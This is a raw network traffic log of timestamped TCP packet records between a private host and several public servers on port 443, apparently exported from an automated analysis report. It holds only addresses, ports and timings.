                                                                            Dec 19, 2024 15:36:22.754354954 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.758383989 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.768001080 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.768074036 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.768089056 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.768193007 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.771953106 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.771965027 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.772105932 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.775897026 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.776009083 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.784399033 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.784411907 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.784604073 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.788706064 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.788717031 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.788850069 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.797193050 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.797210932 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.797291040 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.805700064 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.805805922 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.805824041 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.805995941 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.810241938 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.810317993 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.818703890 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.818850040 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.826801062 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.826872110 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.831270933 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.831418037 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.936671019 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.936834097 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.941003084 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.941063881 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.947921991 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.947987080 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.952120066 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.952182055 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.952199936 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.952230930 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.952346087 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.952362061 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.952392101 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.955339909 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:22.955399990 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.958734035 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:22.959050894 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:22.959068060 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.975290060 CET49708443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:23.023334026 CET44349708104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:23.110275030 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:23.110337973 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:23.110964060 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:23.111304045 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:23.111334085 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:23.305425882 CET44349708104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:23.305515051 CET44349708104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:23.305569887 CET49708443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:23.306371927 CET49708443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:23.306387901 CET44349708104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:23.446682930 CET49736443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:23.446717978 CET4434973635.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:23.446782112 CET49736443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:23.447027922 CET49736443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:23.447036982 CET4434973635.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:23.757622957 CET44349733104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:23.757929087 CET49733443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:23.757958889 CET44349733104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:23.758300066 CET44349733104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:23.758610964 CET49733443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:23.758666992 CET44349733104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:23.758757114 CET49733443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:23.803334951 CET44349733104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:23.803688049 CET49733443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.082132101 CET49680443192.168.2.1720.189.173.13
                                                                            Dec 19, 2024 15:36:24.169331074 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.169634104 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.169668913 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.169996023 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.170391083 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.170453072 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.170552969 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.203253984 CET44349733104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.203347921 CET44349733104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.203443050 CET49733443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.209721088 CET49733443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.209757090 CET44349733104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.211347103 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.322500944 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.323765039 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:24.323812962 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.324244022 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.328313112 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:24.328425884 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.328471899 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:24.328568935 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:24.328613043 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.616205931 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.616259098 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.616296053 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.616329908 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.616347075 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.616360903 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.616374016 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.616378069 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.616405964 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.616781950 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.626636028 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.626715899 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.626727104 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.633095026 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.633301020 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.633306980 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.679498911 CET4434973635.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:24.679910898 CET49736443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:24.679948092 CET4434973635.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:24.681085110 CET4434973635.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:24.681163073 CET49736443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:24.683114052 CET49736443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:24.683115005 CET49736443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:24.683146000 CET4434973635.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:24.683295012 CET4434973635.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:24.689052105 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.689065933 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.737037897 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.737060070 CET49736443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:24.737068892 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.737092972 CET4434973635.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:24.737495899 CET49675443192.168.2.17204.79.197.203
                                                                            Dec 19, 2024 15:36:24.785029888 CET49736443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:24.785032988 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.808367968 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.812370062 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.812433004 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.812463999 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.820549965 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.820621967 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.820647955 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.820826054 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.820887089 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.820918083 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.820950031 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.820977926 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:24.820997953 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.821012020 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.821043968 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:24.821062088 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:24.826597929 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.828306913 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.828401089 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.828435898 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.834954023 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.835036993 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:24.835077047 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.843800068 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.843862057 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.843894958 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.843930960 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.844003916 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.851771116 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.859781981 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.859858990 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.859929085 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.859966993 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.860172987 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.867429972 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.875452042 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.875519991 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.875538111 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.880050898 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:24.880079985 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.883691072 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.883749962 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.883769035 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.928062916 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:24.928081036 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.928107977 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.940651894 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:24.976018906 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:24.992026091 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:24.992063046 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.000879049 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.002496958 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.002624989 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.002660036 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.011948109 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.012032032 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.012054920 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.012798071 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.012875080 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.012911081 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.016721964 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.016848087 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.016855001 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.016865969 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.016911983 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.021599054 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.024539948 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.024609089 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.024642944 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.024672985 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.024802923 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.030921936 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.031007051 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.031023979 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.031099081 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.032383919 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.035706043 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.035712004 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.035785913 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.040307045 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.040329933 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.040333986 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.040400028 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.040431023 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.040476084 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.040472984 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.048042059 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.049741983 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.049760103 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.049830914 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.054527044 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.054536104 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.054590940 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.055958986 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.056054115 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.056078911 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.063819885 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.063922882 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.063936949 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.063965082 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.064043045 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.071798086 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.071866989 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.071880102 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.073261023 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.073339939 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.079570055 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.079739094 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.079752922 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.092644930 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.092689037 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.092746973 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.092777014 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.092853069 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.098929882 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.105520010 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.105609894 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.105623960 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.131443977 CET4434973635.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:25.131540060 CET4434973635.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:25.131798029 CET49736443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:25.131820917 CET4434973635.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:25.131840944 CET49736443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:25.131880999 CET49736443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:25.132263899 CET49737443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:25.132316113 CET4434973735.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:25.132399082 CET49737443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:25.132698059 CET49737443192.168.2.1735.190.80.1
                                                                            Dec 19, 2024 15:36:25.132710934 CET4434973735.190.80.1192.168.2.17
                                                                            Dec 19, 2024 15:36:25.151032925 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.195647955 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.195746899 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.203142881 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.203211069 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.205142021 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.206980944 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.207062960 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.207406044 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.207469940 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.207503080 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.212413073 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.212488890 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.212497950 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.214354038 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.214416981 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.218210936 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.218281984 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.221848965 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.221864939 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.222100019 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.222120047 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.225805998 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.225878000 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.230856895 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.230897903 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.230917931 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.230947018 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.230964899 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.233191967 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.233275890 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.239216089 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.239289045 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.239330053 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.239392042 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.240633965 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.240700006 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.240724087 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.240752935 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.240813971 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.240823984 CET44349734104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.240838051 CET49734443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:25.247452021 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.247467041 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.247533083 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.255845070 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.255861998 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.255914927 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.259721994 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.259792089 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.268054008 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.268121958 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.276236057 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.276316881 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.284521103 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.284595966 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.288580894 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.288654089 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.294878960 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.294975996 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.397826910 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.397908926 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.402616024 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.402693033 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.409404039 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.409476042 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.412499905 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.412564039 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.418734074 CET44349735104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:25.418838978 CET49735443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:25.424747944 CET44349735104.18.95.41192.168.2.17
